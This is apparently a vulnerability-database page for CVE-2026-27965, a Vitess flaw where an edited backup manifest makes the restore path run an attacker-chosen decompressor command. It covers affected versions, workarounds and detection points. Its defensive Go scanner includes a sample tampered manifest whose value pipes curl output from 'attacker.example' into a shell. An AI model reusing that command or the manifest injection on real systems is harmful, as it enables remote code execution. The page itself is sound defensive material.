CVE-2026-27965
Published 2026-02-26
Priority P268 · critical · 9.9 (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
EPSS: 0.42% (33.4th percentile)
Vitess is a database clustering system for horizontal scaling of MySQL. Prior to versions 23.0.3 and 22.0.4, anyone with read/write access to the backup storage location (e.g. an S3 bucket) can edit a backup's manifest file so that a command of their choosing is executed on the restoring host when that backup is restored: the restore path runs the external decompressor named in the manifest, and the manifest is trusted as written. This gives the attacker unintended/unauthorized access to the production deployment environment, including the information available there and the ability to run further arbitrary commands. Versions 23.0.3 and 22.0.4 contain a patch. Workarounds are available. Operators who intend to use an external decompressor can always pass that command in the `--external-decompressor` flag of `vttablet` and `vtbackup`; the flag value then overrides any value in the manifest. Operators who intend to use neither an external nor an internal decompressor can set `--external-decompressor` to a harmless command such as `cat` or `tee` on both `vttablet` and `vtbackup`, so that a benign command is always used. The workaround neutralizes the manifest field at restore time only; manifests that have already been altered in storage still need to be found and audited.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linuxfoundation | vitess | < 22.0.4 | 22.0.4 |
| linuxfoundation | vitess | >= 23.0.0 < 23.0.3 | 23.0.3 |
| msrc | azl3_vitess_19.0.4-7_on_azure_linux_3.0 | — | — |
| msrc | azl3_vitess_19.0.4-9_on_azure_linux_3.0 | — | — |
| msrc | cbl2_vitess_17.0.7-14_on_cbl_mariner_2.0 | — | — |
| vitess.io | vitess | >= 0 < 0.22.4 | 0.22.4 |
| vitess.io | vitess | >= 0 <= 0.23.2 | — |
| vitess.io | vitess | >= 0.23.0 < 0.23.3 | 0.23.3 |
| vitessio | vitess | < 22.0.4 | 22.0.4 |
| vitessio | vitess | — | — |
Detection & IOCs (extracted from sources)
- Monitor for unexpected or modified backup manifest files in the backup storage locations (e.g. S3 buckets) used by Vitess; an attacker with read/write access can alter these files to inject a command that runs at restore time.
- Alert on unexpected or attacker-controlled values in the external decompressor field of Vitess backup manifest files; this field is what the restore path executes, so any value the operator did not configure is suspect.
- Audit `vttablet` and `vtbackup` process invocations to confirm the `--external-decompressor` flag carries the operator-intended value, and watch for unexpected child processes spawned by these binaries during backup restore operations, which may indicate a tampered manifest being acted on.
- Versions prior to 23.0.3 and 22.0.4 are vulnerable; in patched versions the operator-supplied `--external-decompressor` flag overrides the manifest-specified decompressor, so the manifest can no longer choose the command.
- If no external decompressor is intended, set `--external-decompressor` to a safe no-op command (e.g. `cat` or `tee`) on both `vttablet` and `vtbackup` to neutralize any malicious value embedded in a backup manifest.
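The detection points above, and the workaround described in the summary, come down to one check that can be scripted: read each backup MANIFEST and treat any external decompressor value that is not exactly the command the operator configured as an alert. The following Go program is an added example written for this page, not code from Vitess; it assumes the manifest is JSON with a top-level key named `ExternalDecompressor` (the page only says "external decompressor field"), and the three manifest bodies it scans are constructed samples, not real backups. The check is an exact-string allowlist rather than a metacharacter scan alone, because the attacker chooses the program itself, not just its arguments.

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
	"strings"
)

// Manifest holds the subset of a Vitess builtin-backup MANIFEST that this
// check inspects. The key name ExternalDecompressor is an assumption made
// for this example; unknown keys in the real manifest are ignored by
// json.Unmarshal.
type Manifest struct {
	BackupMethod         string `json:"BackupMethod"`
	CompressionEngine    string `json:"CompressionEngine"`
	ExternalDecompressor string `json:"ExternalDecompressor"`
}

// shellMeta is a cheap extra signal: characters that only make sense if the
// command string were meant to be interpreted by a shell.
var shellMeta = regexp.MustCompile("[;&|$`<>(){}\\\\\n]")

// Finding describes one scanned manifest. An empty Reason means it is clean.
type Finding struct {
	Path   string
	Value  string
	Reason string
}

// CheckManifest parses one MANIFEST body and flags an ExternalDecompressor
// value that is not in the operator's allowlist. allowed holds the exact
// command strings the operator passes via --external-decompressor; for a
// site that uses no external decompressor it is empty, so every non-empty
// manifest value is flagged.
func CheckManifest(path string, body []byte, allowed []string) (Finding, error) {
	var m Manifest
	if err := json.Unmarshal(body, &m); err != nil {
		return Finding{}, fmt.Errorf("%s: unparsable manifest: %w", path, err)
	}
	cmd := strings.TrimSpace(m.ExternalDecompressor)
	f := Finding{Path: path, Value: cmd}
	switch {
	case cmd == "":
		// Nothing for the restore path to exec.
	case contains(allowed, cmd):
		// Exactly what the operator configured.
	case shellMeta.MatchString(cmd):
		f.Reason = "shell metacharacters in ExternalDecompressor"
	default:
		f.Reason = "ExternalDecompressor not in operator allowlist"
	}
	return f, nil
}

func contains(list []string, s string) bool {
	for _, v := range list {
		if v == s {
			return true
		}
	}
	return false
}

// samples are constructed manifest bodies, not real backups: one with no
// external decompressor, one using the operator's expected command, and one
// tampered so that restore would run an attacker-chosen program.
var samples = map[string]string{
	"ks/-80/2026-02-20.123456.zone1-0000000101/MANIFEST": `{"BackupMethod":"builtin","CompressionEngine":"pgzip","ExternalDecompressor":""}`,
	"ks/-80/2026-02-21.123456.zone1-0000000101/MANIFEST": `{"BackupMethod":"builtin","CompressionEngine":"external","ExternalDecompressor":"zstd -d"}`,
	"ks/-80/2026-02-22.123456.zone1-0000000101/MANIFEST": `{"BackupMethod":"builtin","CompressionEngine":"external","ExternalDecompressor":"bash -c 'curl -s http://attacker.example/x | sh'"}`,
}

// ScanSamples runs CheckManifest over the constructed samples and returns
// only the flagged manifests, keyed by path.
func ScanSamples(allowed []string) (map[string]Finding, error) {
	flagged := map[string]Finding{}
	for path, body := range samples {
		f, err := CheckManifest(path, []byte(body), allowed)
		if err != nil {
			return nil, err
		}
		if f.Reason != "" {
			flagged[path] = f
		}
	}
	return flagged, nil
}

func main() {
	// The operator's configured decompressor; anything else is an alert.
	flagged, err := ScanSamples([]string{"zstd -d"})
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	for path, f := range flagged {
		fmt.Printf("ALERT %s: %s (value %q)\n", path, f.Reason, f.Value)
	}
}
```

To run this against a real backup location, replace the `samples` map with the MANIFEST objects fetched from the bucket (for S3, listing the backup prefix and copying each `MANIFEST` down) and set `allowed` to exactly the `--external-decompressor` value configured on your `vttablet` and `vtbackup` processes, or leave it empty if you use none.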
CVSS provenance
- NVD, CVSS v3.1: 9.9 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
- NVD, CVSS v4.0: 8.4 HIGH, CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:H/VI:H/VA:L/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
- Vendor (MSRC): 8.4 HIGH
OSV
osv · 2026-03-10
CVE-2026-27965: Vitess users with backup storage access can gain unauthorized access to production deployment environments in vitess.io/vitess
GHSA
ghsa · 2026-02-26
CVE-2026-27965 [HIGH] CWE-78: Vitess users with backup storage access can gain unauthorized access to production deployment environments
### Impact
Any user with read/write access to the backup storage location (e.g. an S3 bucket) can manipulate backup manifest files so that arbitrary code is later executed when that backup is restored. This can be used to provide that attacker with unintended/unauthorized access to the production deployment environment — allowing them to access information available in that environment as well as run any additional arbitrary commands there.
### Patches
Fixes are expected to be released with versions v23.0.3 and v22.0.4
See fix commit at https://github.com/vitessio/vitess/commit/4c0173293907af9cb942a6683c465c3f1e9fdb5c
### Workarounds
If maintainers *intended* to use an external d
OSV
osv · 2026-02-26
CVE-2026-27965 [HIGH]: Vitess users with backup storage access can gain unauthorized access to production deployment environments (advisory body identical to the GHSA entry above)
Microsoft
vendor_msrc · 2026-02-10 · CVSS 8.4
CVE-2026-27965 [HIGH] CWE-78: Vitess users with backup storage access can gain unauthorized access to production deployment environments
Tags: Mariner, GitHub_M
Customer Action Required: Yes
Remediation: CBL-Mariner Releases
Reference: https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade
No detection rules found.
No public exploits indexed.